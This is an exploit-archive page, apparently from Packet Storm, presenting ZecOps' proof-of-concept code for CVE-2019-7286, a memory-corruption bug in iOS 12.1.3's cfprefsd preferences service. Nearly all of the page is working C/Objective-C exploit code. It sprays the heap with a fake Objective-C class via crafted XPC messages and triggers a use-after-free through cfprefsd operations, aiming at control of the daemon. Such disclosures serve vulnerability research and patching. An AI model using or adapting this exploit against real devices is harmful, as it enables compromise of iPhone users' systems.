exploit the possibilities

iOS 12.1.3 cfprefsd Memory Corruption

iOS 12.1.3 cfprefsd Memory Corruption
Posted May 6, 2019
Authored by ZecOps

iOS version 12.1.3 cfprefsd memory corruption exploit.

tags | exploit
systems | ios
advisories | CVE-2019-7286
MD5 | 5f2945567a2b5f4158fe44116484e39d

iOS 12.1.3 cfprefsd Memory Corruption

Change Mirror Download
// (c) 2019 ZecOps, Inc. - https://www.zecops.com - Find Attackers' Mistakes
// Intended only for educational and defensive purposes only.
// Use at your own risk.

#include <xpc/xpc.h>
#import <pthread.h>
#include <mach/mach.h>
#include <mach/task.h>
#include <dlfcn.h>
#include <mach-o/dyld_images.h>
#include <objc/runtime.h>

#define AGENT 1

#define FILL_DICT_COUNT 0x600
#define FILL_COUNT 0x1000
#define FREE_COUNT 0x2000
#define FILL_SIZE (0xc0)

int need_stop = 0;

struct heap_spray {
void* fake_objc_class_ptr;
uint32_t r10;
uint32_t r4;
void* fake_sel_addr;
uint32_t r5;
uint32_t r6;
uint64_t cmd;
uint8_t pad1[0x3c];
uint32_t stack_pivot;
struct fake_objc_class_t {
char pad[0x8];
void* cache_buckets_ptr;
uint32_t cache_bucket_mask;
} fake_objc_class;
struct fake_cache_bucket_t {
void* cached_sel;
void* cached_function;
} fake_cache_bucket;
char command[32];
};

void fill_once(){

#if AGENT
xpc_connection_t client = xpc_connection_create_mach_service("com.apple.cfprefsd.agent",0,0);
#else
xpc_connection_t client = xpc_connection_create_mach_service("com.apple.cfprefsd.daemon",0,XPC_CONNECTION_MACH_SERVICE_PRIVILEGED);
#endif

xpc_connection_set_event_handler(client, ^void(xpc_object_t response) {
xpc_type_t t = xpc_get_type(response);
if (t == XPC_TYPE_ERROR){
printf("err: %s\n", xpc_dictionary_get_string(response, XPC_ERROR_KEY_DESCRIPTION));
need_stop = 1 ;
}
//printf("received an event\n");
});

xpc_connection_resume(client);
xpc_object_t main_dict = xpc_dictionary_create(NULL, NULL, 0);

xpc_object_t arr = xpc_array_create(NULL, 0);

xpc_object_t spray_dict = xpc_dictionary_create(NULL, NULL, 0);
xpc_dictionary_set_int64(spray_dict, "CFPreferencesOperation", 8);
xpc_dictionary_set_string(spray_dict, "CFPreferencesDomain", "xpc_str_domain");
xpc_dictionary_set_string(spray_dict, "CFPreferencesUser", "xpc_str_user");

char key[100];
char value[FILL_SIZE];
memset(value, "A", FILL_SIZE);
*((uint64_t *)value) = 0x4142010180202020;
//*((uint64_t *)value) = 0x180202020;
value[FILL_SIZE-1]=0;
for (int i=0; i<FILL_DICT_COUNT; i++) {
sprintf(key, "%d",i);
xpc_dictionary_set_string(spray_dict, key, value);
}

//NSLog(@"%@", spray_dict);
for (uint64_t i=0; i<FILL_COUNT; i++) {
xpc_array_append_value(arr, spray_dict);
}

xpc_dictionary_set_int64(main_dict, "CFPreferencesOperation", 5);

xpc_dictionary_set_value(main_dict, "CFPreferencesMessages", arr);

void* heap_spray_target_addr = (void*)0x180202000;
struct heap_spray* map = mmap(heap_spray_target_addr, 0x1000, 3, MAP_ANON|MAP_PRIVATE|MAP_FIXED, 0, 0);
memset(map, 0, 0x1000);
struct heap_spray* hs = (struct heap_spray*)((uint64_t)map + 0x20);
//hs->null0 = 0;
hs->cmd = -1;
hs->fake_objc_class_ptr = &hs->fake_objc_class;
hs->fake_objc_class.cache_buckets_ptr = &hs->fake_cache_bucket;
hs->fake_objc_class.cache_bucket_mask = 0;
hs->fake_sel_addr = &hs->fake_cache_bucket.cached_sel;
// nasty hack to find the correct selector address
hs->fake_cache_bucket.cached_sel = 0x7fff00000000 + (uint64_t)NSSelectorFromString(@"dealloc");

hs->fake_cache_bucket.cached_function = 0xdeadbeef;
size_t heap_spray_pages = 0x40000;
size_t heap_spray_bytes = heap_spray_pages * 0x1000;
char* heap_spray_copies = malloc(heap_spray_bytes);
for (int i = 0; i < heap_spray_pages; i++){
memcpy(heap_spray_copies+(i*0x1000), map, 0x1000);
}
xpc_dictionary_set_data(main_dict, "heap_spray", heap_spray_copies, heap_spray_bytes);

//NSLog(@"%@", main_dict);
xpc_connection_send_message(client, main_dict);
printf("fill once\n");
xpc_release(main_dict);
}

void trigger_vul(){
#if AGENT
printf("AGENT\n");
xpc_connection_t conn = xpc_connection_create_mach_service("com.apple.cfprefsd.agent",0,0);
#else
printf("DAEMON\n");
xpc_connection_t conn = xpc_connection_create_mach_service("com.apple.cfprefsd.daemon",0,XPC_CONNECTION_MACH_SERVICE_PRIVILEGED);
#endif
xpc_connection_set_event_handler(conn, ^(xpc_object_t response) {
xpc_type_t t = xpc_get_type(response);
if (t == XPC_TYPE_ERROR){
printf("err: %s\n", xpc_dictionary_get_string(response, XPC_ERROR_KEY_DESCRIPTION));
need_stop = 1 ;
}
});
xpc_connection_resume(conn);

xpc_object_t hello = xpc_dictionary_create(NULL, NULL, 0);
xpc_object_t arr = xpc_array_create(NULL, 0);

xpc_object_t arr_free = xpc_dictionary_create(NULL, NULL, 0);
xpc_dictionary_set_int64(arr_free, "CFPreferencesOperation", 4);
xpc_array_append_value(arr, arr_free);
for (int i=0; i<FREE_COUNT; i++) {
xpc_object_t arr_elem1 = xpc_dictionary_create(NULL, NULL, 0);
xpc_dictionary_set_int64(arr_elem1, "CFPreferencesOperation", 20);
xpc_array_append_value(arr, arr_elem1);
}
//printf("%p, %p\n", arr_elem1, hello);
xpc_dictionary_set_int64(hello, "CFPreferencesOperation", 5);
xpc_dictionary_set_value(hello, "CFPreferencesMessages", arr);

//NSLog (@"%@", hello);
fill_once();
xpc_connection_send_message(conn, hello);
NSLog(@" trigger vuln");
xpc_release(hello);
}

int main(int argc, const char * argv[]) {

pthread_t fillthread1,triger_thread;
NSLog(@"start to trigger..");
trigger_vul();

return 0;
}

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

June 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    1 Files
  • 2
    Jun 2nd
    2 Files
  • 3
    Jun 3rd
    19 Files
  • 4
    Jun 4th
    21 Files
  • 5
    Jun 5th
    15 Files
  • 6
    Jun 6th
    12 Files
  • 7
    Jun 7th
    11 Files
  • 8
    Jun 8th
    1 Files
  • 9
    Jun 9th
    1 Files
  • 10
    Jun 10th
    15 Files
  • 11
    Jun 11th
    15 Files
  • 12
    Jun 12th
    15 Files
  • 13
    Jun 13th
    8 Files
  • 14
    Jun 14th
    16 Files
  • 15
    Jun 15th
    2 Files
  • 16
    Jun 16th
    1 Files
  • 17
    Jun 17th
    18 Files
  • 18
    Jun 18th
    0 Files
  • 19
    Jun 19th
    0 Files
  • 20
    Jun 20th
    0 Files
  • 21
    Jun 21st
    0 Files
  • 22
    Jun 22nd
    0 Files
  • 23
    Jun 23rd
    0 Files
  • 24
    Jun 24th
    0 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close